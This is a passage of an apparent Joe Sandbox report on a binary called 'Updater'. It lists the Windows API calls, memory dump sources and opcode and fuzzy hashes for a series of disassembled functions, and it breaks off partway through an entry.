                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                    • Opcode ID: 589070dbb829c95bba6fced30081441ac675158ebdf53824ec053a4eaa2d6137
                                                                                                                                                    • Instruction ID: 58bdf3871098affa00bc231fccb42a31589e0f2068ffca3fdabfc3ca8e230dbb
                                                                                                                                                    • Opcode Fuzzy Hash: 589070dbb829c95bba6fced30081441ac675158ebdf53824ec053a4eaa2d6137
                                                                                                                                                    • Instruction Fuzzy Hash: C7512870D006499FCB20CFA8DC91BEEBBF4EF08302F14459AE956E7291E7B49A44CB54
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BB379A
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00BB37CD
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00BB3802
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BB3834
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BB385E
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00BB386F
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BB3889
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                    • Opcode ID: 206beb02ed0de9cc1daf68356cd5b1312a1bcb10ac367ccfc10cf3b4a1ff1bfb
                                                                                                                                                    • Instruction ID: 63a53cea9f02ef0f2ce057df6cbe877dc616a6fe1d337e82fef1de5cef11a3a8
                                                                                                                                                    • Opcode Fuzzy Hash: 206beb02ed0de9cc1daf68356cd5b1312a1bcb10ac367ccfc10cf3b4a1ff1bfb
                                                                                                                                                    • Instruction Fuzzy Hash: A9312174A04258AFDB24CF19EC85FB537E5FB4AB10F1582A4F5058B2B2CBB1AD40CB42
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B88629
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8864F
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B88652
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B88670
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B88679
                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B8869E
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B886AC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                    • Opcode ID: 149d87d1976831fc331b988e63984ef3db61d1116ca2414adc151997bd23c29b
                                                                                                                                                    • Instruction ID: ae19e0aff108981960f0814a7aeb6d209085efc5d8a1138c7b6d5d394367a70b
                                                                                                                                                    • Opcode Fuzzy Hash: 149d87d1976831fc331b988e63984ef3db61d1116ca2414adc151997bd23c29b
                                                                                                                                                    • Instruction Fuzzy Hash: CB219576604219AF9F10EFA8DC84CBB73ECEF093647448565FA15DB261EA74EC41CB60
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B88704
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8872A
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B8872D
                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00B8874E
                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00B88757
                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B88771
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B8877F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                    • Opcode ID: 0e4887baa1c61db4bec40b27dcdfe08a56701ac9c2c974a9f4c1e168a2b86ca2
                                                                                                                                                    • Instruction ID: 5dbed96118cc6b7ade3fd49c3cb1b58890c738218de3ca1acf1ba3a4a2c286d5
                                                                                                                                                    • Opcode Fuzzy Hash: 0e4887baa1c61db4bec40b27dcdfe08a56701ac9c2c974a9f4c1e168a2b86ca2
                                                                                                                                                    • Instruction Fuzzy Hash: BD217475604205AF9B10BFA8DC88D6A77FCEF083607548265FA05CB2A1EF74EC41C764
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00B91350
                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B91383
                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00B91395
                                                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B913CF
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B913F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$Create$CloseFilePipe
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 3408351469-2873401336
                                                                                                                                                    • Opcode ID: 197e08035c008cfe02046c8188cf3af46be6a3bc98299bfca783e9b0d245ab68
                                                                                                                                                    • Instruction ID: 302f70e9f80c6a0d0126176c74e6f144f785c5ce9700190a11d81da5d1c0b6a7
                                                                                                                                                    • Opcode Fuzzy Hash: 197e08035c008cfe02046c8188cf3af46be6a3bc98299bfca783e9b0d245ab68
                                                                                                                                                    • Instruction Fuzzy Hash: 9C215C7050430ABBDF208F29D805A9A7BF8FF54760F204AA9E8A0D72D0EB709840EB14
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00B91424
                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B91456
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00B91467
                                                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B914A1
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B914C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$Create$CloseFilePipe
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 3408351469-2873401336
                                                                                                                                                    • Opcode ID: 55b800ffd0a925b45d3d8127bad1326b43da2b674f44796b6e517fa5c7cf5694
                                                                                                                                                    • Instruction ID: dd93e20a2eef722966de7594c29c915d5b344147c8d32fac6196c3585f15c9a3
                                                                                                                                                    • Opcode Fuzzy Hash: 55b800ffd0a925b45d3d8127bad1326b43da2b674f44796b6e517fa5c7cf5694
                                                                                                                                                    • Instruction Fuzzy Hash: 43214B71500307ABDF209F6D9844A99B7E8EF59720F204BA9E9A0A73D0EB709851DB51
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
                                                                                                                                                      • Part of subcall function 00B34570: GetStockObject.GDI32(00000011), ref: 00B345C2
                                                                                                                                                      • Part of subcall function 00B34570: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC
                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BB4ACB
                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BB4AD8
                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BB4AE3
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BB4AF2
                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BB4AFE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                    • Opcode ID: d5e2336b7bbe0833cc166acef28e7df5b440fa7eeb45c70f332ba0cc9dc6ad22
                                                                                                                                                    • Instruction ID: b59318a402cf3d3b92a346926cbd864b3b7a71ba5a43859b88ddd96a77f15c63
                                                                                                                                                    • Opcode Fuzzy Hash: d5e2336b7bbe0833cc166acef28e7df5b440fa7eeb45c70f332ba0cc9dc6ad22
                                                                                                                                                    • Instruction Fuzzy Hash: BE1193B22502197FEF114F64CC82EE77FADEF08798F014111B648A2090CBB2DC21DBA4
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2929853658-0
                                                                                                                                                    • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                                                                                                    • Instruction ID: 77326012cc0cff2a756482842859fd235bb3601a1db0243deaf1dd45bc4108d3
                                                                                                                                                    • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                                                                                                    • Instruction Fuzzy Hash: BD117C31541B04EAFA30FBB0DC47FCB77DCAF05706F4009D5BBA9A6052EE64BA089660
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B8E86E
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00B8E875
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B8E88B
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00B8E892
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B8E8D6
                                                                                                                                                    Strings
                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00B8E8B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                                                    • Opcode ID: 7f2c63a630c699e3cfd8d6a940b2d4978863b5af662e006eb36cf786ac11bbc8
                                                                                                                                                    • Instruction ID: 20b93201ece8f6c15df5577cb52ac9cbddc4940a2a4b73936c0aa842e594ef3d
                                                                                                                                                    • Opcode Fuzzy Hash: 7f2c63a630c699e3cfd8d6a940b2d4978863b5af662e006eb36cf786ac11bbc8
                                                                                                                                                    • Instruction Fuzzy Hash: DD01FFF69402087FE750A7949D89EEB77ACD708701F4046E5BB4AE3051EAB89E848B71
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(00000034,00000034), ref: 00B917C9
                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000014,?), ref: 00B917DB
                                                                                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 00B917E9
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00B917F7
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B91806
                                                                                                                                                    • InterlockedExchange.KERNEL32(00000034,000001F6), ref: 00B91816
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000014), ref: 00B9181D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                    • Opcode ID: 5b7a2194074aba0d059a1f8734638aa6eedd455613ee238619c1fd58a35ce47c
                                                                                                                                                    • Instruction ID: 20774626c94d194c26b5cb4c3fc21eba799572b02860a4944e1c6c6b790fb379
                                                                                                                                                    • Opcode Fuzzy Hash: 5b7a2194074aba0d059a1f8734638aa6eedd455613ee238619c1fd58a35ce47c
                                                                                                                                                    • Instruction Fuzzy Hash: AEF0EC32155612BBD74A1B64ED8CBD6BB79FF04752F401621F101928A0ABB8E470DB94
                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00B34614
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B34655
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00B3467D
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00B347BD
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B347DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                                    • Opcode ID: caf4dbcf5a6f43d560d1c6978ff5f67e9b25af9bbe7457437b4d1d8e8d473e20
                                                                                                                                                    • Instruction ID: 5c3a8632b98459065eddf181149cdd44ab3110219ea3ebcc2de050bf66223853
                                                                                                                                                    • Opcode Fuzzy Hash: caf4dbcf5a6f43d560d1c6978ff5f67e9b25af9bbe7457437b4d1d8e8d473e20
                                                                                                                                                    • Instruction Fuzzy Hash: AAB17878A0064ADBDB14CFA8C4847EEB7F1FF58310F24855AE8AAD7250EB34AD51DB50
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00BA3C99: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00BA3CE5
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00BA299C
                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BA29BD
                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00BA29CE
                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00BA2A68
                                                                                                                                                    • htons.WSOCK32(?), ref: 00BA2AB7
                                                                                                                                                    • _strlen.LIBCMT ref: 00BA2B11
                                                                                                                                                      • Part of subcall function 00B84A80: _strlen.LIBCMT ref: 00B84A8A
                                                                                                                                                      • Part of subcall function 00B3F3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,00008000,?,00000000,00000000,00000000,?,00008000,00008000,?,00B8D9C7,00008000,?,?), ref: 00B3F402
                                                                                                                                                      • Part of subcall function 00B3F3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,?,00008000,00008000,?,00B8D9C7,00008000,?,?), ref: 00B3F435
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1923757996-0
                                                                                                                                                    • Opcode ID: 457973cce26a4b243be7ae10f9ae0e95ebbcfd2f0572df52fe33188cf97a00f3
                                                                                                                                                    • Instruction ID: 8ea108117a2d8b91acf30941fa56ad82202d476dc9ff7efee4de4a800150048e
                                                                                                                                                    • Opcode Fuzzy Hash: 457973cce26a4b243be7ae10f9ae0e95ebbcfd2f0572df52fe33188cf97a00f3
                                                                                                                                                    • Instruction Fuzzy Hash: 6CA1E230508300AFC724DF28C895F6A7BE5EF85714F54899CF45A5B2A2DB31EE45CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B48204,00B48204,?,?,?,00B5627D,00000001,00000001,71E85006), ref: 00B56086
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B5627D,00000001,00000001,71E85006,?,?,?), ref: 00B5610C
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,71E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B56206
                                                                                                                                                    • __freea.LIBCMT ref: 00B56213
                                                                                                                                                      • Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860
                                                                                                                                                    • __freea.LIBCMT ref: 00B5621C
                                                                                                                                                    • __freea.LIBCMT ref: 00B56241
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                    • Opcode ID: b758b8caf97956d1fd25760e7d866248ff758d7b88bbfd6a6088d5e146438f04
                                                                                                                                                    • Instruction ID: b7d09b8f24b60c5bd239c87fd0f04311be2f62d2836960834e532f171673edb4
                                                                                                                                                    • Opcode Fuzzy Hash: b758b8caf97956d1fd25760e7d866248ff758d7b88bbfd6a6088d5e146438f04
                                                                                                                                                    • Instruction Fuzzy Hash: 4A51C072A00216ABEB258F64CC81FBB77E9EB44752F5946E9FC04E7180EB35DC58C650
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(00BA5FF9), ref: 00B8085D
                                                                                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 00B80904
                                                                                                                                                    • VariantCopy.OLEAUT32(00B80B20), ref: 00B8092D
                                                                                                                                                    • VariantClear.OLEAUT32(00B80B20), ref: 00B80951
                                                                                                                                                    • VariantCopy.OLEAUT32(00B80B20,00000000), ref: 00B80955
                                                                                                                                                    • VariantClear.OLEAUT32(00BA5FE5), ref: 00B8095F
                                                                                                                                                    Memory Dump Source
